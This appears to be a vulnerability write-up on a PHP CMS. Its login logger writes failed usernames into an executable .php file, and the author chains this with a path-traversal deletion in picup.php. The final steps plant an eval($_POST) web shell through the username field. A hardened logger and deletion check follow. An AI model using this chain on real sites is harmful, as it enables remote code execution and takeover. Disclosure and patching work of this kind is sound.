<p>First, look at login.php in the root directory.</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">&lt;?
$IS_LOGIN = true;
require "./includes/headinc.php";
register_shutdown_function('union_end');

if($action == 'logout') {
    $union_user = $union_pass = $gid = '';
    //clearcookies();
    //$sess_arr = array();
    $_SESSION[sess_arr] = $sess_arr = '';
    session_unregister('sess_arr');
    echo "&lt;meta http-equiv=\"refresh\" content=\"0;url=admin.php\"&gt;";
    //header("Location:login.php");
    exit;
}

if($action == 'login') {
    $validate_t = crypt($validate, 'ckskya576');
    if($_SESSION[md5vali] != $validate_t)
    //showmessage("CAPTCHA check failed, please go back");

    $UNION_USER = '';
    $loginpass2 = md5($loginpass);
    $UNION_USER = $db->fetchSingle("SELECT uid AS union_uid, fig AS union_fig, username AS union_user, password AS union_pass FROM table_members WHERE username='$loginuser' && password='$loginpass2'");
    if($UNION_USER[union_uid] && !$UNION_USER[union_fig])
        showmessage('此帐号不可用');
    if ($UNION_USER) {
        //$qs_ts = $db->query_fetch("select * from table_sessions where username='$UNION_USER[union_user]' && ip!='$yip'");
        //if($qs_ts[username])
        //    showmessage('Sorry, the same account cannot be logged in on several computers at once');
        //echo "delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'";exit;
        //$db->query("delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'");
        #$db->queryDb("update table_members set loginnum=loginnum+1,lastlogin='".time()."' where uid=$UNION_USER[union_uid]",1);
        //union_setcookie("union_user_", $UNION_USER['union_user']);
        //union_setcookie("union_pass_", $UNION_USER['union_pass']);
    }else{
        $errorlog = "$loginuser\t".substr($loginpass, 0, 2);
        for($i = 3; $i < strlen($loginpass); $i++) {
            $errorlog .= "*";
        }
        $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";

        @$fp = fopen("./data/log/passlog.php", "a");
        @flock($fp, 3);
        @fwrite($fp, $errorlog);
        @fclose($fp);

        //clearcookies();
    }</code></pre><p>The relevant part is:</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">$errorlog = "$loginuser\t".substr($loginpass, 0, 2);
for($i = 3; $i < strlen($loginpass); $i++) {
    $errorlog .= "*";
}
$errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";

@$fp = fopen("./data/log/passlog.php", "a");
@flock($fp, 3);
@fwrite($fp, $errorlog);
@fclose($fp);</code></pre><p>On a failed login, the wrong username and the masked password are written straight into data/log/passlog.php...</p><p>Think about it: is that not an arbitrary code write?</p><p>It is openly letting you write malicious code into that file. Can you write a one-line shell straight in? Of course you can.</p><p>For example, enter &lt;?php phpinfo();?&gt; as the username and anything as the password; afterwards, visit data/log/passlog.php to see whether it executed.</p><p>However, there are usually already many failed-login records in that file, so the file is broken and cannot execute right away. But have you thought of my previous post?</p><p>Arbitrary file deletion, directly.</p><p>The getshell steps are as follows (do not do anything bad; you bear the consequences):</p><p>1. First visit something like http://XXX.COM/picup.php?action=del&pic=../data/log/passlog.php<br>2. Then visit http://XXX.COM/login.php<br>Username: &lt;?php phpinfo();eval($_POST[XXX]);?&gt;<br>Password: 3333333<br>3. Visit <a href="http://XXX.COM/data/log/passlog.php" rel="nofollow">http://XXX.COM/data/log/passlog.php</a>; that is the shell, and its password is XXX.</p>
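<p>As an added example that is not part of the original write-up or the CMS's code, here is a hardened replacement for the failed-login logger, together with a containment check for the picup.php deletion step it is chained with; the function names, log path and sample IP are assumptions.</p>

```php
<?php
// Added example, not the CMS's code; function names and paths are assumptions.
// Keep the real log outside the web root with a non-executable extension;
// the temp-dir path here only lets the example run stand-alone.
define('FAILED_LOGIN_LOG', sys_get_temp_dir() . '/failed_logins.log');

function log_failed_login(string $user, string $ip): string
{
    // Record the username only; no fragment of the password touches disk.
    // json_encode() escapes quotes, backslashes and control characters, and
    // JSON_HEX_TAG rewrites < and > as \u003C and \u003E, so a "<?php" tag or
    // an embedded newline can neither run nor break the one-record-per-line format.
    $record = json_encode([
        'ts'   => gmdate('c'),
        'user' => mb_substr($user, 0, 64),   // cap length (mbstring assumed)
        'ip'   => filter_var($ip, FILTER_VALIDATE_IP) ?: 'invalid',
    ], JSON_UNESCAPED_UNICODE | JSON_HEX_TAG) . "\n";

    $fp = fopen(FAILED_LOGIN_LOG, 'a');
    if ($fp === false) {
        error_log('failed-login log unavailable');   // surface it, do not @-suppress
        return $record;
    }
    if (flock($fp, LOCK_EX)) {   // the original's flock($fp, 3) is LOCK_UN: it never locked
        fwrite($fp, $record);
        flock($fp, LOCK_UN);
    }
    fclose($fp);
    return $record;
}

// Delete only files that resolve inside the upload directory, rejecting
// "../" traversal such as pic=../data/log/passlog.php.
function delete_upload(string $uploadDir, string $name): bool
{
    $base   = realpath($uploadDir);
    $target = realpath($uploadDir . '/' . $name);
    if ($base === false || $target === false) {
        return false;   // unknown base directory or nonexistent file
    }
    // The resolved target must begin with "<base>/"; anything else escaped.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return unlink($target);
}

// Constructed usage mirroring the write-up's payload:
echo log_failed_login('<?php phpinfo();?>', '203.0.113.5');
var_dump(delete_upload(sys_get_temp_dir(), '../etc/passwd'));   // bool(false)
```

The printed record shows the username stored as escaped JSON text (\u003C?php ...), which the web server has no reason to interpret, and the deletion helper refuses a path that resolves outside its base directory.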